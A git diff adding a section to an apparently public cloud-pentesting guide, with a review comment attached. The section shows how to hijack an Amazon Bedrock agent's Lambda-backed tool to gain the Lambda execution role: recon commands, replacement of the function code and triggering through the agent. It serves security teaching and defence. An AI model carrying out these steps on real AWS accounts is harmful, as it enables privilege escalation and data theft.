diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md index 017d1323b..213c01edd 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md @@ -29,7 +29,7 @@ List interpreters (control-plane) and inspect their configuration: ```bash aws bedrock-agentcore-control list-code-interpreters aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id -```` +``` > The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have. 
@@ -108,6 +108,84 @@ awscurl -X POST \ * Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary). * Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation. +## Amazon Bedrock Agents + +### `lambda:UpdateFunctionCode`, `bedrock:InvokeAgent` - Agent Tool Hijacking via Lambda + +Bedrock Agents can use **Lambda-backed action groups** as tools (external execution). If a principal can **modify the code of a Lambda function used by an agent**, and can then **invoke the agent**, they can execute attacker-controlled code under the **Lambda execution role**. + +> [!NOTE] +> This is a **cross-service trust abuse** (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent. + +#### Preconditions (common misconfiguration) + +- A Bedrock Agent exists with an **action group backed by a Lambda function** +- The attacker has: + - `lambda:UpdateFunctionCode` + - `bedrock:InvokeAgent` +- The Lambda execution role has broader permissions than the attacker +- The attacker can identify the Lambda used by the agent + +#### Recon + +Enumerate agent action groups: + +```bash +aws bedrock-agent list-agents +aws bedrock-agent get-agent --agent-id +aws bedrock-agent list-agent-action-groups --agent-id +``` + +Inspect Lambda: + +```bash +aws lambda get-function --function-name +``` + +#### Exploitation + +Replace Lambda code: + +```bash +zip payload.zip lambda_function.py + +aws lambda update-function-code \ + --function-name \ + --zip-file fileb://payload.zip +``` + +Example payload: + +```python +import boto3 + +def lambda_handler(event, context): + return boto3.client("sts").get_caller_identity() +``` + +Trigger via agent: + +```bash +aws bedrock-agent-runtime invoke-agent \ + --agent-id \ + --agent-alias-id \ + --session-id test \ + --input-text "trigger tool" +``` + 
+#### Impact + +* **Privilege escalation** into Lambda execution role +* **Data exfiltration** from AWS services +* **Cross-service abuse** via trusted agent execution + +#### Mitigations + +* **Restrict** `lambda:UpdateFunctionCode` +* Use **least-privilege** Lambda roles +* **Monitor** Lambda code changes +* **Audit** Bedrock agent tool usage + ## References - [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/) @@ -116,6 +194,7 @@ awscurl -X POST \ - [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) - [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html) - [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html) +- [SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)](https://www.softwaresecured.com/post/aws-privilege-escalation-iam-risks-service-based-attacks-and-new-ai-driven-bedrock-agentcore-vectors) {{#include ../../../../banners/hacktricks-training.md}}
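Review bot: In the second hunk (the new "Amazon Bedrock Agents" section), the "#### Mitigations" list is far less actionable than the AgentCore mitigations in the context lines just above it, which name SCPs and CloudTrail data events. "Restrict `lambda:UpdateFunctionCode`" and "Monitor Lambda code changes" should say how. For example: scope `lambda:UpdateFunctionCode` to specific function ARNs so it cannot reach functions that back agent action groups, enforce Lambda code signing on those functions so an unsigned package is rejected, and alert on CloudTrail records of UpdateFunctionCode calls against them. Separately, the "#### Recon" steps call `list-agents`, `get-agent`, `list-agent-action-groups` and `lambda get-function`, but neither the heading nor "#### Preconditions" names the read permissions those calls need. Listing them would tell defenders which grants complete the path. Last, `--agent-id`, `--agent-alias-id` and `--function-name` appear with no value in every added command. If angle-bracket placeholders were intended, check that they survive rendering.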